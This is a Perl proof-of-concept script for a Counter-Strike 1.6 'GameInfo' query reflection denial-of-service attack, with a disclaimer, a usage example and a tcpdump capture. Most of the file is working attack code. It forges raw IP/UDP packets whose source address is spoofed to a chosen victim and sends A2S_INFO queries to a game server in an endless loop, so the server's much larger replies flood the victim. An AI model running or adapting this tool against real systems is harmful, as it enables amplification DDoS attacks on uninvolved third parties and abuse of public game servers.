cs1.6 Exploit

1. #!/usr/bin/perl
2. #
3. # Counter-Strike 1.6 'GameInfo' Query Reflection DoS
4. # Proof Of Concept
5. #
6. # #
7. #
8. # Disclaimer:
9. # This or previous program is for Educational
10. # purpose ONLY. Do not use it without permission.
11. # The usual disclaimer applies, especially the
12. # fact that Todor Donev is not liable for any
13. # damages caused by direct or indirect use of the
14. # information or functionality provided by these
15. # programs. The author or any Internet provider
16. # bears NO responsibility for content or misuse
17. # of these programs or any derivatives thereof.
18. # By using these programs you accept the fact
19. # that any damage (dataloss, system crash,
20. # system compromise, etc.) caused by the use
21. # of these programs is not Todor Donev's
22. # responsibility.
23. #
24. # Use at your own risk and educational
25. # purpose ONLY!
26. #
27. # See also, UDP-based Amplification Attacks:
28. # https://www.us-cert.gov/ncas/alerts/TA14-017A
29. #
30. # # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
31. # [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
32. # [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10
33. # ^C
34. #
35. # # tcpdump -i eth0 -c4 port 27010
36. # tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
37. # listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
38. # 00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
39. # 00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
40. # 00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
41. # 00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
42. # 4 packets captured
43. # 4 packets received by filter
44. # 0 packets dropped by kernel
45.  
46.  
47. use strict;
48. use Socket;
49. use warnings;
50. no warnings 'uninitialized';
51.  
52. print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
53. die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
54. my $css = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits)
55. my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits)
56. my $port = $ARGV[2] || '27015'; # Int between 1 and 65535 Default: 27015
57. die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
58. if (!defined $css || !defined $victim) {
59. print "[ Usg: $0 <cstrike server> <victim> <port>\n";
60. print "[ Default port: 27015\n";
61. print "[ <todor.donev\@gmail.com> Todor Donev\n";
62. exit;
63. }
64.  
65. print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
66. socket(RAW, AF_INET, SOCK_RAW, 255) || die $!;
67. setsockopt(RAW, 0, 1, 1) || die $!;
68. main();
69.  
70. # Main program
71. sub main {
72. my $packet;
73.  
74. $packet = iphdr();
75. $packet .= udphdr();
76. $packet .= cshdr();
77. # b000000m...
78. send_packet($packet);
79. }
80.  
81. # IP header (Layer 3)
82. sub iphdr {
83. my $ip_ver = 4; # IP Version 4 (4 bits)
84. my $iphdr_len = 5; # IP Header Length (4 bits)
85. my $ip_tos = 0; # Differentiated Services (8 bits)
86. my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
87. my $ip_frag_id = 0; # Identification Field (16 bits)
88. my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
89. my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
90. my $ip_ttl = 255; # IP TTL (8 bits)
91. my $ip_proto = 17; # IP Protocol (8 bits)
92. my $ip_checksum = 0; # IP Checksum (16 bits)
93.  
94. # IP Packet
95. my $iphdr = pack(
96. 'H2 H2 n n B16 h2 c n a4 a4',
97. $ip_ver . $iphdr_len, $ip_tos,
98. $ip_total_len, $ip_frag_id,
99. $ip_frag_flag . $ip_frag_offset,
100. $ip_ttl, $ip_proto, $ip_checksum,
101. $victim, $css
102. );
103. return $iphdr;
104. }
105.  
106. # UDP Header (Layer 4)
107. sub udphdr {
108. my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
109. my $udp_dst_port = $port; # UDP Dest Port (16 btis) (0-65535)
110. my $udp_len = 8 + length(cshdr()); # UDP Length (16 bits) (0-65535)
111. my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
112.  
113. # UDP Packet
114. my $udphdr = pack(
115. 'n n n n',
116. $udp_src_port,
117. $udp_dst_port,
118. $udp_len,
119. $udp_checksum
120. );
121. return $udphdr;
122. }
123.  
124. # Counter-Strike 'GameInfo' request
125. sub cshdr {
126.  
127. #
128. # https://developer.valvesoftware.com/wiki/Server_queries
129. #
130. # https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
131. # Requests
132. # The server responds to 5 queries:
133. #
134. # A2S_INFO 'T' (0x54)
135. # Basic information about the server.
136. # A2S_PLAYER 'U' (0x55)
137. # Details about each player on the server.
138. # A2S_RULES 'V' (0x56)
139. # The rules the server is using.
140. # A2A_PING 'i' (0x69)
141. # Ping the server. (DEPRECATED)
142. # A2S_SERVERQUERY_GETCHALLENGE 'W' (0x57)
143. # Returns a challenge number for use in the player and rules query. (DEPRECATED)
144. #
145. # Queries should be sent in UDP packets to the listen port of the server.
146. #
147.  
148. # 25 bytes - A2S_INFO
149. my $query = "\xff\xff\xff\xff\x54"; # 0000 ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69 ....TSource Engi
150. $query .= "\x53\x6f\x75\x72\x63"; # 0010 6e 65 20 51 75 65 72 79 00 ne Query.
151. $query .= "\x65\x20\x45\x6e\x67";
152. $query .= "\x69\x6e\x65\x20\x51";
153. $query .= "\x75\x65\x72\x79\x00";
154.  
155. my $cshdr = pack('a*', $query);
156. return $cshdr;
157. }
158.  
159. sub send_packet {
160. while(1){
161. select(undef, undef, undef, 0.40); # Sleep 400 milliseconds
162. send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css)) || die $!;
163. }
164. }